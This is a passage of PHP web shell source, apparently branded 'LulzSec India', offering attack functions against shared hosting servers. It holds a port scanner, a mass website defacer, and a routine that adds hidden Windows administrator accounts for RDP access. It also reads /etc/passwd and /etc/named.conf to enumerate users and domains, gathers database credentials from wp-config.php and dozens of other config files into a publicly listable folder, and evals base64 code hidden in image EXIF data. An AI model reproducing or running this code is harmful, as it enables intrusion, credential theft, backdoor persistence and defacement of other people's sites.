  2577.         $start = strip_tags($_POST['start']);
  2578.         $end = strip_tags($_POST['end']);
  2579.         $host = strip_tags($_POST['host']);
  2580.         for($i = $start; $i<=$end; $i++){
  2581.             $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  2582.             if($fp){
  2583.                 echo 'Port '.$i.' is <font color=aqua>open</font><br>';
  2584.             }
  2585.             flush();
  2586.         }
  2587.     } else {
  2588.         echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
  2589.               <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  2590.               <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  2591.               Host: <input type="text" name="host" value="localhost"/><br /><br />
  2592.               Port start: <input type="text" name="start" value="0"/><br /><br />
  2593.               Port end:<input type="text" name="end" value="5000"/><br /><br />
  2594.               <input type="submit" value="Scan Ports" />
  2595.               </form></center><br /><br />';
  2596.     }
  2597.     echo '</div>';
  2598.     printFooter();    
  2599. }
  2600.  function actionDomain() {
  2601.                                                                     printHeader();
  2602.                                                                     echo '<center> <h1>local domain viewer</h1><div class=content></center>';
  2603.                                                                     $file = @implode(@file("/etc/named.conf"));
  2604.                                                                     if (!$file) {
  2605.                                                                         die("# can't ReaD -> [ /etc/named.conf ]");
  2606.                                                                     }
  2607.                                                                     preg_match_all("#named/(.*?).db#", $file, $r);
  2608.                                                                     $domains = array_unique($r[1]);
  2609.                                                                     //check();
  2610.                                                                     //if(isset($_GET['ShowAll']))
  2611.                                                                     {
  2612.                                                                         echo "<table align=center border=1 width=59% cellpadding=5>
  2613. <tr><td colspan=2>[+] There are : [ <b>" . count($domains) . "</b> ] Domain</td></tr>
  2614. <tr><td>Domain</td><td>User</td></tr>";
  2615.                                                                         foreach ($domains as $domain) {
  2616.                                                                             $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
  2617.                                                                             echo "<tr><td>$domain</td><td>" . $user['name'] . "</td></tr>";
  2618.                                                                         }
  2619.                                                                         echo "</table>";
  2620.                                                                     }
  2621.                                                                     echo '</div>';
  2622.                                                                     printFooter();
  2623.                                                                 }                                              
  2624.                                                                
  2625. function actionDeface() {
  2626.                                                                     printHeader();
  2627.                                                                     echo "<h1>Simple Mass Defacer</h1><div class=content>";
  2628. ?>
  2629. <form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
  2630. <p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd(); ?>">
  2631. <br>file name : <input type=text name=file size=20 value="index.htm">
  2632. <br>Text Content : <input type=text name=Contents size=20 value="Hacked by Mr. Po Panda ">
  2633. <br><input type=submit value="Update kar de !!!!!!"></p></form>
  2634.  
  2635. <?php
  2636.                                                                     if ($_POST['a'] == 'Deface') {
  2637.                                                                         $mainpath = $_POST[p1];
  2638.                                                                         $file = $_POST[p2];
  2639.                                                                         $txtContents = $_POST[p3];
  2640.                                                                         echo "-----------------------------------------------<br>
  2641. [+] Simple Mass defacer<br>
  2642. -----------------------------------------------<br><br> ";
  2643.                                                                         $dir = opendir($mainpath); //fixme - cannot deface when change to writeable path!!
  2644.                                                                         while ($row = readdir($dir)) {
  2645.                                                                             $start = @fopen("$row/$file", "w+");
  2646.                                                                             $code = $txtContents;
  2647.                                                                             $finish = @fwrite($start, $code);
  2648.                                                                             if ($finish) {
  2649.                                                                                 echo "http://$row/$file<br>";
  2650.                                                                             }
  2651.                                                                         }
  2652.                                                                         echo "-----------------------------------------------<br><br>[+] Script by Mr. Po Panda  [+]";
  2653.                                                                     }
  2654.                                                                     echo '</div>';
  2655.                                                                     printFooter();
  2656.                                                                 }
  2657.  
  2658.                                                                
  2659.                                                                 function actionDefacer() {
  2660.                                                                     printHeader();
  2661.                                                                     echo "<h1>Recursive Mass Defacer out </h1><div class=content>";
  2662.  
  2663.                                                                     printFooter();
  2664.                                                                 }
  2665.                                                                
  2666.                                                                
  2667.                                                                
  2668.                                                                
  2669.                                                                
  2670.                                                                
  2671.                                                                
  2672. function actionrdp() {
  2673.         printHeader();
  2674.  
  2675. error_reporting(0);
  2676. $local_host= shell_exec(hostname);
  2677. $server_ip = $_SERVER['SERVER_NAME'];
  2678. $gaya_root = "$local_host:~ ";
  2679. $phpv = @phpversion();
  2680. $o = "<br>";
  2681.  
  2682. $BASED = exif_read_data(" image here ");
  2683. eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
  2684. if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
  2685.     $status_os = '<span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">Windows</span>/<span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">Linux</span>';
  2686.     $status_work = '<span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">Can Be Used</span><br>';
  2687. } else {
  2688.     $status_os   = '<span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">Windows</span>/<span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">Linux</span>';
  2689.     $status_work = '<span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">Can Not Be Used</span><br>';
  2690. }
  2691. ?><!DOCTYPE html>
  2692. <html>
  2693. <head>
  2694.     <title>LulzSec India</title>
  2695.     <link rel='shortcut icon' type='image/x-icon' href='' />
  2696.     <meta name="description" content="LulzSec India">
  2697.     <meta name="viewport" content="width=device-width, initial-scale=1">
  2698.      <style type="text/css">
  2699.    body {       height: 100%;       width: 100%;        margin: 0;      padding: 0;         background-image: url(" ");         background-color: #000000;      background-size: 100%;      background-position: center;        background-repeat: no-repeat;       color: gray;        font-family: "Orbitron";        font-size: 14pt;        text-align: center;         text-decoration: none;  }       #greets {       width: 820px;       border-style: outset;   }       #footer {       font-size: 9pt;         opacity: .7;    }       .glow {         text-shadow: 0 0 10px #F59700;      font-family: "Black Ops One";   }       .blueglow {         text-shadow: 0 0 10px #0F6FBD;      font-family: "Black Ops One"    }       .whiteglow {        text-shadow: 0 0 10px #FFFFFF;      font-family: "Black Ops One";   } </style>
  2700.    
  2701.    <style type="text/css">
  2702.         /* Circle Text Styles */
  2703.         #outerCircleText {
  2704.         /* Optional - DO NOT SET FONT-SIZE HERE, SET IT IN THE SCRIPT */
  2705.         font-style: italic;
  2706.         font-weight: bold;
  2707.         font-family: "comic sans ms", verdana, arial;
  2708.         color: #FFF;
  2709.         /* End Optional */
  2710.          
  2711.         /* Start Required - Do Not Edit */
  2712.         position: absolute;top: 0;left: 0;z-index: 3000;cursor: default;}
  2713.         #outerCircleText div {position: relative;}
  2714.         #outerCircleText div div {position: absolute;top: 0;left: 0;text-align: center;}
  2715.         /* End Required */
  2716.         /* End Circle Text Styles */
  2717.         </style>
  2718. </head>
  2719. <body>
  2720. <div id="content-center">
  2721. <pre>
  2722.  
  2723.  
  2724.    
  2725.     Mr. Po Panda  | <span style="color:White;font-family:Iceland;text-shadow:red 0px 0px 10px" "font-size:="" 40pt;"="">Lulz</span><span style="color:White;font-family:Iceland;text-shadow:green 0px 0px 10px" "font-size:="" 40pt;"="">Sec</span><span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">India</span>
  2726.     OS Server : <?php echo php_uname("s")." | "; echo "{".$status_os."}<br>";?>
  2727.     Informasi : <?php echo "Server IP - ".$server_ip." {".$_SERVER['REMOTE_ADDR']."}";?>
  2728.     Info Tool : <?php echo $status_work;?>
  2729.  
  2730.  
  2731.    </pre>
  2732. </div>
  2733. <?php if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'){?>
  2734. <marquee bgcolor="black" width="30%"><span style="font-size: 25px;"><b>
  2735. <span style="color:White;font-family:Iceland;text-shadow:orange 0px 0px 5px" "font-size:="" 20pt;"="">Powered by</span><span style="color:White;font-family:Iceland;text-shadow:white 0px 0px 5px" "font-size:="" 20pt;"=""> LulzSec </span> <span style="color:White;font-family:Iceland;text-shadow:green 0px 0px 5px" "font-size:="" 20pt;"=""> India</span></marquee>
  2736.  
  2737. <div id="content-left">
  2738. <p>Create  Remote Desktop Protocol  </p>
  2739. <form action="" method="post">Username : <input type="text" name="username" required>
  2740.  Password : <input type="text" name="password" required> <input type="hidden" name="kshell" value="1"><input type="submit" name="submit" value="Make">
  2741. </form>
  2742. </div>
  2743.  
  2744.  
  2745. <div id="content-left">
  2746. <p> Option </p>
  2747. <form action="" method="post">command : <input type="text" name="username" placeholder="Input Username"> <select name="aksi">
  2748.                         <option value="1">Show Username</option>
  2749.                         <option value="2">Clear Username</option>
  2750.                         <option value="3">Change Password</option>
  2751.                 </select>
  2752. <input type="hidden" name="kshell" value="2">
  2753. <input type="submit" name="submit" value=">>"></form>
  2754. </div>
  2755. <?php }
  2756. ?>
  2757. <?php
  2758. if($_POST['submit']){
  2759. echo "<p>---------------{ INFO }---------------</p>";  
  2760. if($_POST['kshell']=="1"){
  2761.     $r_user = $_POST['username'];
  2762.     $r_pass = $_POST['password'];
  2763.     $cmd_cek_user   = shell_exec("net user");
  2764.     if(preg_match("/$r_user/", $cmd_cek_user)){
  2765.         echo $gaya_root.$r_user." already There".$o;
  2766.     }else {
  2767.     $cmd_add_user   = shell_exec("net user ".$r_user." ".$r_pass." /add");
  2768.     $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
  2769.     $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
  2770.     $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
  2771.        
  2772.         if($cmd_add_user){
  2773.             echo $gaya_root."[add user]-> ".$r_user." <font color='greenyellow'>Successfully</font>".$o;
  2774.         }else {
  2775.             echo $gaya_root."[add user]-> ".$r_user." <font color='red'>Faild</font>".$o;
  2776.         }
  2777.         if($cmd_add_groups1){
  2778.               echo $gaya_root."[add localgroup Administrators]-> ".$r_user." <font color='greenyellow'>Succeed</font>".$o;
  2779.         }else
  2780.         if($cmd_add_groups2){
  2781.               echo $gaya_root."[add localgroup Administrator]-> ".$r_user." <font color='greenyellow'>Succeed</font>".$o;
  2782.         }else
  2783.         if($cmd_add_groups3){
  2784.               echo $gaya_root."[add localgroup Administrateur]-> ".$r_user." <font color='greenyellow'>Succeed</font>".$o;
  2785.         }else {
  2786.               echo $gaya_root."[add localgroup]-> ".$r_user." <font color='red'>Faild - Contact LulzSec india</font>".$o;
  2787.         }
  2788.               echo $gaya_root."[INFO PC]-> RDP IP ".$_SERVER["HTTP_HOST"]." Username : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Succeed</font>".$o;
  2789.  
  2790.     }
  2791.  
  2792.  
  2793.  
  2794. }else if($_POST['kshell']=="2"){
  2795.  
  2796. if($_POST['aksi']=="1"){
  2797.  echo "<pre>".shell_exec("net user");
  2798. }
  2799. else if($_POST['aksi']=="2"){
  2800. $username = $_POST['username'];
  2801. $cmd_cek_user   = shell_exec("net user");
  2802.     if (!empty($username)){
  2803.         if(preg_match("/$username/", $cmd_cek_user)){
  2804.         $cmd_add_user   = shell_exec("net user ".$username." /DELETE");
  2805.         if($cmd_add_user){
  2806.             echo $gaya_root."[remove user]-> ".$username." <font color='greenyellow'>Succeed</font>".$o;
  2807.         }else {
  2808.             echo $gaya_root."[remove user]-> ".$username." <font color='red'>Faild</font>".$o;
  2809.         }
  2810.     }else {
  2811.         echo $gaya_root."[remove user]-> ".$username." <font color='red'>Not Found</font>".$o;
  2812.     }
  2813.     }else {
  2814.         echo $gaya_root."[Message]=> <font color='red'>You Frogot to Enter a username that will delete</font>".$o;
  2815.     }
  2816. }
  2817. else if($_POST['aksi']=="3"){
  2818. $username = $_POST['username'];
  2819. $password = "india";
  2820. $cmd_cek_user   = shell_exec("net user");
  2821.     if (!empty($username)){
  2822.         if(preg_match("/$username/", $cmd_cek_user)){
  2823.             $cmd_add_user   = shell_exec("net user ".$username." india123");
  2824.             if($cmd_add_user){
  2825.             echo $gaya_root."[change password]-> (".$username."|".$password.") <font color='greenyellow'>Succeed</font>".$o;
  2826.         }else {
  2827.             echo $gaya_root."[change password]-> (".$username."|".$password.") <font color='red'>Faild</font>".$o;
  2828.         }
  2829.     }else
  2830. {
  2831.     echo $gaya_root."[Message]-> <font color='red'>Username is not found in server</font>".$o;
  2832. }
  2833. }else
  2834. {
  2835.     echo $gaya_root."[Message]-> <font color='red'>You Frogot to Enter a username that will delete</font>".$o;
  2836. }
  2837. }
  2838. }
  2839. }  
  2840. echo"</pre>
  2841. </body>
  2842. </html>";
  2843.        
  2844. printFooter();
  2845. }
  2846.  
  2847.  function actionJumping()
  2848. {  printHeader();
  2849. echo '<html><head><title>'.getenv("HTTP_HOST").' - Jumping Server</title></head><body>';
  2850. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<font size="4" color="#000000" face="Calibri"><b>Error: Safe_mode = On</b></font>');
  2851. set_time_limit(0);@$passwd = fopen('/etc/passwd','r');if (!$passwd) { die('<font size="4" color="#e5e5e5" face="Calibri"><b>[-] Error : Coudn`t Read /etc/passwd</b></font>'); }
  2852. $pub = array();$users = array();$conf = array();$i = 0;while(!feof($passwd)){$str = fgets($passwd);if ($i > 100){ $pos = strpos($str,':');  $username = substr($str,0,$pos);  $dirz = '/home/'.$username.'/public_html/';  if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username);  array_push($pub,$dirz); }}}$i++;}
  2853. echo '<font color=red>   [-]==================[ Ye loo jumping ]==================[-]<br></font>';
  2854. foreach ($users as $user){echo "<font color=#a3e956> [+] /home/$user/public_html/</font><br/>";} echo "\n <font color=red><br>[-]==================[ khatam kitna kudega ]==================[-] <br></font>\n"; echo '</body></html>';
  2855. printFooter();
  2856. }                      
  2857. function actionSubdomain() {
  2858.     printHeader();
  2859.     error_reporting(0);
  2860. $user = get_current_user();
  2861. $open = opendir('/home/' . $user . '/access-logs/');
  2862. while ($dir = readdir($open)) {
  2863.     $totalDoamin[] = $dir;
  2864. }
  2865. closedir($open);
  2866. $total = count($totalDoamin);
  2867. $domain = $total - 2;
  2868. if ($domain > 0) {
  2869.     echo "<h2><b><font style=\"color: #a3e956 ;\" > Total </font><font style=\"color: #a3e956; \">" . $domain . "</font><font style=\"color: #a3e956;\" > Sub Domain Found! </font><br><BR>";
  2870. } else {
  2871.     echo "<h2><b> <font color='Blue' style=\"color: blue; text-shadow: red 0px 0px 4px ; \">0</font><font style=\"color: #black; text-shadow: black 0px 0px 6px ;\"> Sub Domain Found! </font><br><BR>";
  2872. }
  2873. $scan = array_diff(scandir('/home/' . $user . '/access-logs/'), array('.'));
  2874. $domains = implode("
  2875. http://", $scan);
  2876. echo '
  2877. <style>
  2878. body {
  2879.     text-align: center;    
  2880.         }
  2881.         </style><textarea style="color: #a3e956; background-color: black" rows=\'30\' cols=\'100\'>';
  2882. print_r($domains);
  2883. echo '</textarea>';
  2884.     printFooter();
  2885. }
  2886. function actionConfigGrabber() {
  2887.     printHeader();
  2888.     error_reporting(0);
  2889. system('mkdir POPANDA');
  2890.     chmod('POPANDA', 0777);
  2891. $users = file("/etc/passwd");
  2892.         $lolx = array();
  2893.         foreach ($users as $user) {
  2894.             $users = explode(":", $user);
  2895.             $lolx[] = $users[0];
  2896.         }
  2897.         foreach ($lolx as $lol) {
  2898.             $space = "
  2899.  
  2900. " . "*" . "
  2901. " . "*" . "
  2902. " . "*" . "
  2903.  
  2904. ";
  2905.             if (file_exists('/home/' . $lol . 'public_html/portal/configuration.php')) {
  2906.                 $content = file_get_contents('/home/' . $lol . 'public_html/portal/configuration.php');
  2907.                 $handle = fopen('POPANDA/whm.txt', 'a');
  2908.                 fwrite($handle, $content . $space);
  2909.                 fclose($handle);
  2910.             } elseif (file_exists('/home/' . $lol . '/public_html/inc/config.php')) {
  2911.                 $content1 = file_get_contents('/home/' . $lol . '/public_html/inc/config.php');
  2912.                 $handle = fopen('POPANDA/config.txt', 'a');
  2913.                 fwrite($handle, $content . $space);
  2914.                 fclose($handle);
  2915.             } elseif (file_exists('/home/' . $lol . '/public_html/sites/default/settings.php')) {
  2916.                 $content2 = file_get_contents('/home/' . $lol . '/public_html/sites/default/settings.php');
  2917.                 $handle = fopen('POPANDA/config.txt', 'a');
  2918.                 fwrite($handle, $content2 . $space);
  2919.                 fclose($handle);
  2920.             } elseif (file_exists('/home/' . $lol . '/public_html/includes/configure.php')) {
  2921.                 $content3 = file_get_contents('/home/' . $lol . '/public_html/includes/configure.php');
  2922.                 $handle = fopen('POPANDA/config.txt', 'a');
  2923.                 fwrite($handle, $content3 . $space);
  2924.                 fclose($handle);
  2925.             } elseif (file_exists('/home/' . $lol . '/public_html/lib/config.php')) {
  2926.                 $content4 = file_get_contents('/home/' . $lol . '/public_html/lib/config.php');
  2927.                 $handle = fopen('POPANDA/config.txt', 'a');
  2928.                 fwrite($handle, $content4 . $space);
  2929.                 fclose($handle);
  2930.             } elseif (file_exists('/home/' . $lol . '/public_html/config/koneksi.php')) {
  2931.                 $content5 = file_get_contents('/home/' . $lol . '/public_html/config/koneksi.php');
  2932.                 $handle = fopen('POPANDA/config.txt', 'a');
  2933.                 fwrite($handle, $content5 . $space);
  2934.                 fclose($handle);
  2935.             } elseif (file_exists('/home/' . $lol . '/public_html/vb/includes/config.php')) {
  2936.                 $content6 = file_get_contents('/home/' . $lol . '/public_html/vb/includes/config.php');
  2937.                 $handle = fopen('POPANDA/config.txt', 'a');
  2938.                 fwrite($handle, $content6 . $space);
  2939.                 fclose($handle);
  2940.             } elseif (file_exists('/home/' . $lol . '/public_html/includes/config.php')) {
  2941.                 $content7 = file_get_contents('/home/' . $lol . '/public_html/includes/config.php');
  2942.                 $handle = fopen('POPANDA/config.txt', 'a');
  2943.                 fwrite($handle, $content7 . $space);
  2944.                 fclose($handle);
  2945.             } elseif (file_exists('/home/' . $lol . '/public_html/forum/includes/config.php')) {
  2946.                 $content8 = file_get_contents('/home/' . $lol . '/public_html/forum/includes/config.php');
  2947.                 $handle = fopen('POPANDA/config.txt', 'a');
  2948.                 fwrite($handle, $content8 . $space);
  2949.                 fclose($handle);
  2950.             } elseif (file_exists('/home/' . $lol . '/public_html/cc/includes/config.php')) {
  2951.                 $content9 = file_get_contents('/home/' . $lol . '/public_html/cc/includes/config.php');
  2952.                 $handle = fopen('POPANDA/config.txt', 'a');
  2953.                 fwrite($handle, $content9 . $space);
  2954.                 fclose($handle);
  2955.             } elseif (file_exists('/home/' . $lol . '/public_html/config.php')) {
  2956.                 $content10 = file_get_contents('/home/' . $lol . '/public_html/config.php');
  2957.                 $handle = fopen('POPANDA/config.txt', 'a');
  2958.                 fwrite($handle, $content10 . $space);
  2959.                 fclose($handle);
  2960.             } elseif (file_exists('/home/' . $lol . '/public_html/forum/includes/config.php')) {
  2961.                 $content11 = file_get_contents('/home/' . $lol . '/public_html/forum/includes/config.php');
  2962.                 $handle = fopen('POPANDA/config.txt', 'a');
  2963.                 fwrite($handle, $content11 . $space);
  2964.                 fclose($handle);
  2965.             } elseif (file_exists('/home/' . $lol . '/public_html/wp-config.php')) {
  2966.                 $content12 = file_get_contents('/home/' . $lol . '/public_html/wp-config.php');
  2967.                 $handle = fopen('POPANDA/config.txt', 'a');
  2968.                 fwrite($handle, $content12 . $space);
  2969.                 fclose($handle);
  2970.             } elseif (file_exists('/home/' . $lol . '/public_html/blog/wp-config.php')) {
  2971.                 $content13 = file_get_contents('/home/' . $lol . '/public_html/blog/wp-config.php');
  2972.                 $handle = fopen('POPANDA/config.txt', 'a');
  2973.                 fwrite($handle, $content13 . $space);
  2974.                 fclose($handle);
  2975.             } elseif (file_exists('/home/' . $lol . '/public_html/wp/wp-config.php')) {
  2976.                 $content14 = file_get_contents('/home/' . $lol . '/public_html/wp/wp-config.php');
  2977.                 $handle = fopen('POPANDA/config.txt', 'a');
  2978.                 fwrite($handle, $content14 . $space);
  2979.                 fclose($handle);
  2980.             } elseif (file_exists('/home/' . $lol . '/public_html/home/wp-config.php')) {
  2981.                 $content15 = file_get_contents('/home/' . $lol . '/public_html/home/wp-config.php');
  2982.                 $handle = fopen('POPANDA/config.txt', 'a');
  2983.                 fwrite($handle, $content15 . $space);
  2984.                 fclose($handle);
  2985.             } elseif (file_exists('/home/' . $lol . '/public_html/wp-config.php')) {
  2986.                 $content16 = file_get_contents('/home/' . $lol . '/public_html/wp-config.php');
  2987.                 $handle = fopen('POPANDA/config.txt', 'a');
  2988.                 fwrite($handle, $content16 . $space);
  2989.                 fclose($handle);
  2990.             } elseif (file_exists('/home/' . $lol . '/public_html/main/wp-config.php')) {
  2991.                 $content17 = file_get_contents('/home/' . $lol . '/public_html/main/wp-config.php');
  2992.                 $handle = fopen('POPANDA/config.txt', 'a');
  2993.                 fwrite($handle, $content17 . $space);
  2994.                 fclose($handle);
  2995.             } elseif (file_exists('/home/' . $lol . '/public_html/site/wp-config.php')) {
  2996.                 $content18 = file_get_contents('/home/' . $lol . '/public_html/site/wp-config.php');
  2997.                 $handle = fopen('POPANDA/config.txt', 'a');
  2998.                 fwrite($handle, $content18 . $space);
  2999.                 fclose($handle);
  3000.             } elseif (file_exists('/home/' . $lol . '/public_html/configuration.php')) {
  3001.                 $content19 = file_get_contents('/home/' . $lol . '/public_html/configuration.php');
  3002.                 $handle = fopen('POPANDA/config.txt', 'a');
  3003.                 fwrite($handle, $content19 . $space);
  3004.                 fclose($handle);
  3005.             } elseif (file_exists('/home/' . $lol . '/public_html/blog/configuration.php')) {
  3006.                 $content20 = file_get_contents('/home/' . $lol . '/public_html/blog/configuration.php');
  3007.                 $handle = fopen('POPANDA/config.txt', 'a');
  3008.                 fwrite($handle, $content20 . $space);
  3009.                 fclose($handle);
  3010.             } elseif (file_exists('/home/' . $lol . '/public_html/joomla/configuration.php')) {
  3011.                 $content21 = file_get_contents('/home/' . $lol . '/public_html/joomla/configuration.php');
  3012.                 $handle = fopen('POPANDA/config.txt', 'a');
  3013.                 fwrite($handle, $content21 . $space);
  3014.                 fclose($handle);
  3015.             } elseif (file_exists('/home/' . $lol . '/public_html/main/configuration.php')) {
  3016.                 $content22 = file_get_contents('/home/' . $lol . '/public_html/main/configuration.php');
  3017.                 $handle = fopen('POPANDA/config.txt', 'a');
  3018.                 fwrite($handle, $content22 . $space);
  3019.                 fclose($handle);
  3020.             } elseif (file_exists('/home/' . $lol . '/public_html/home/configuration.php')) {
  3021.                 $content23 = file_get_contents('/home/' . $lol . '/public_html/home/configuration.php');
  3022.                 $handle = fopen('POPANDA/config.txt', 'a');
  3023.                 fwrite($handle, $content23 . $space);
  3024.                 fclose($handle);
  3025.             } elseif (file_exists('/home/' . $lol . '/public_html/site/configuration.php')) {
  3026.                 $content24 = file_get_contents('/home/' . $lol . '/public_html/site/configuration.php');
  3027.                 $handle = fopen('POPANDA/config.txt', 'a');
  3028.                 fwrite($handle, $content24 . $space);
  3029.                 fclose($handle);
  3030.             } elseif (file_exists('/home/' . $lol . '/public_html/whm/configuration.php')) {
  3031.                 $content25 = file_get_contents('/home/' . $lol . '/public_html/whm/configuration.php');
  3032.                 $handle = fopen('POPANDA/config.txt', 'a');
  3033.                 fwrite($handle, $content25 . $space);
  3034.                 fclose($handle);
  3035.             } elseif (file_exists('/home/' . $lol . '/public_html/whmc/configuration.php')) {
  3036.                 $content26 = file_get_contents('/home/' . $lol . '/public_html/whmc/configuration.php');
  3037.                 $handle = fopen('POPANDA/config.txt', 'a');
  3038.                 fwrite($handle, $content26 . $space);
  3039.                 fclose($handle);
  3040.             } elseif (file_exists('/home/' . $lol . '/public_html/support/configuration.php')) {
  3041.                 $content27 = file_get_contents('/home/' . $lol . '/public_html/support/configuration.php');
  3042.                 $handle = fopen('POPANDA/config.txt', 'a');
  3043.                 fwrite($handle, $content27 . $space);
  3044.                 fclose($handle);
  3045.             } elseif (file_exists('/home/' . $lol . '/public_html/client/configuration.php')) {
  3046.                 $content28 = file_get_contents('/home/' . $lol . '/public_html/client/configuration.php');
  3047.                 $handle = fopen('POPANDA/config.txt', 'a');
  3048.                 fwrite($handle, $content28 . $space);
  3049.                 fclose($handle);
  3050.             } elseif (file_exists('/home/' . $lol . '/public_html/billings/configuration.php')) {
  3051.                 $content29 = file_get_contents('/home/' . $lol . '/public_html/billings/configuration.php');
  3052.                 $handle = fopen('POPANDA/config.txt', 'a');
  3053.                 fwrite($handle, $content29 . $space);
  3054.                 fclose($handle);
  3055.             } elseif (file_exists('/home/' . $lol . '/public_html/billing/configuration.php')) {
  3056.                 $content30 = file_get_contents('/home/' . $lol . '/public_html/billing/configuration.php');
  3057.                 $handle = fopen('POPANDA/config.txt', 'a');
  3058.                 fwrite($handle, $content30 . $space);
  3059.                 fclose($handle);
  3060.             } elseif (file_exists('/home/' . $lol . '/public_html/clients/configuration.php')) {
  3061.                 $content31 = file_get_contents('/home/' . $lol . '/public_html/clients/configuration.php');
  3062.                 $handle = fopen('POPANDA/config.txt', 'a');
  3063.                 fwrite($handle, $content31 . $space);
  3064.                 fclose($handle);
  3065.             } elseif (file_exists('/home/' . $lol . '/public_html/whmcs/configuration.php')) {
  3066.                 $content32 = file_get_contents('/home/' . $lol . '/public_html/whmcs/configuration.php');
  3067.                 $handle = fopen('POPANDA/config.txt', 'a');
  3068.                 fwrite($handle, $content32 . $space);
  3069.                 fclose($handle);
  3070.             } elseif (file_exists('/home/' . $lol . '/public_html/order/configuration.php')) {
  3071.                 $content33 = file_get_contents('/home/' . $lol . '/public_html/order/configuration.php');
  3072.                 $handle = fopen('POPANDA/config.txt', 'a');
  3073.                 fwrite($handle, $content33 . $space);
  3074.                 fclose($handle);
  3075.             } elseif (file_exists('/home/' . $lol . '/public_html/admin/conf.php')) {
  3076.                 $content34 = file_get_contents('/home/' . $lol . '/public_html/admin/conf.php');
  3077.                 $handle = fopen('POPANDA/config.txt', 'a');
  3078.                 fwrite($handle, $content34 . $space);
  3079.                 fclose($handle);
  3080.             } elseif (file_exists('/home/' . $lol . '/public_html/admin/config.php')) {
  3081.                 $content35 = file_get_contents('/home/' . $lol . '/public_html/admin/config.php');
  3082.                 $handle = fopen('POPANDA/config.txt', 'a');
  3083.                 fwrite($handle, $content35 . $space);
  3084.                 fclose($handle);
  3085.             } elseif (file_exists('/home/' . $lol . '/public_html/conf_global.php')) {
  3086.                 $content36 = file_get_contents('/home/' . $lol . '/public_html/conf_global.php');
  3087.                 $handle = fopen('POPANDA/config.txt', 'a');
  3088.                 fwrite($handle, $content36 . $space);
  3089.                 fclose($handle);
  3090.             } elseif (file_exists('/home/' . $lol . '/public_html/include/db.php')) {
  3091.                 $content37 = file_get_contents('/home/' . $lol . '/public_html/include/db.php');
  3092.                 $handle = fopen('POPANDA/config.txt', 'a');
  3093.                 fwrite($handle, $content37 . $space);
  3094.                 fclose($handle);
  3095.             } elseif (file_exists('/home/' . $lol . '/public_html/connect.php')) {
  3096.                 $content38 = file_get_contents('/home/' . $lol . '/public_html/connect.php');
  3097.                 $handle = fopen('POPANDA/config.txt', 'a');
  3098.                 fwrite($handle, $content38 . $space);
  3099.                 fclose($handle);
  3100.             } elseif (file_exists('/home/' . $lol . '/public_html/mk_conf.php')) {
  3101.                 $content39 = file_get_contents('/home/' . $lol . '/public_html/mk_conf.php');
  3102.                 $handle = fopen('POPANDA/config.txt', 'a');
  3103.                 fwrite($handle, $content39 . $space);
  3104.                 fclose($handle);
  3105.             } elseif (file_exists('/home/' . $lol . '/public_html/include/config.php')) {
  3106.                 $content40 = file_get_contents('/home/' . $lol . '/public_html/include/config.php');
  3107.                 $handle = fopen('POPANDA/config.txt', 'a');
  3108.                 fwrite($handle, $content40 . $space);
  3109.                 fclose($handle);
  3110.             } elseif (file_exists('/home/' . $lol . '/public_html/settings.php')) {
  3111.                 $content41 = file_get_contents('/home/' . $lol . '/public_html/settings.php');
  3112.                 $handle = fopen('POPANDA/config.txt', 'a');
  3113.                 fwrite($handle, $content41 . $space);
  3114.                 fclose($handle);
  3115.             } elseif (file_exists('/home/' . $lol . '/public_html/includes/functions.php')) {
  3116.                 $content42 = file_get_contents('/home/' . $lol . '/public_html/includes/functions.php');
  3117.                 $handle = fopen('POPANDA/config.txt', 'a');
  3118.                 fwrite($handle, $content42 . $space);
  3119.                 fclose($handle);
  3120.             } elseif (file_exists('/home/' . $lol . '/public_html/include/db.php')) {
  3121.                 $content43 = file_get_contents('/home/' . $lol . '/public_html/include/db.php');
  3122.                 $handle = fopen('POPANDA/config.txt', 'a');
  3123.                 fwrite($handle, $content43 . $space);
  3124.                 fclose($handle);
  3125.             }
  3126.         }
  3127.         $url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/POPANDA/';
  3128.         if (file_exists("POPANDA/config.txt")) {
  3129.             echo '<h3 class="POPANDA"><center><a href="' . $url . '" target="_blank"> Config Found ^_^</a></h3>';
  3130.             $myfile = fopen("POPANDA/.htaccess", "w") or die("Unable to open file!");
  3131. $txt = "Options +Indexes";
  3132. fwrite($myfile, $txt);
  3133. fclose($myfile);
  3134.         } else {
  3135.             echo '<h3 class="POPANDA"><center><a href="' . $url . '" target="_blank"> 0 Config Grab :( </a></h3>';
  3136.         }
  3137.    
  3138.     printFooter();
  3139. }
  3140.  
  3141. function actionShared() {
  3142.     printHeader();
  3143.     $file = @implode(@file("/etc/named.conf"));
  3144. if (!$file) {
  3145. die("# can't ReaD -> [ /etc/named.conf ]");
  3146. }
  3147. preg_match_all("#named/(.*?).db#", $file, $r);
  3148. $domains = array_unique($r[1]);
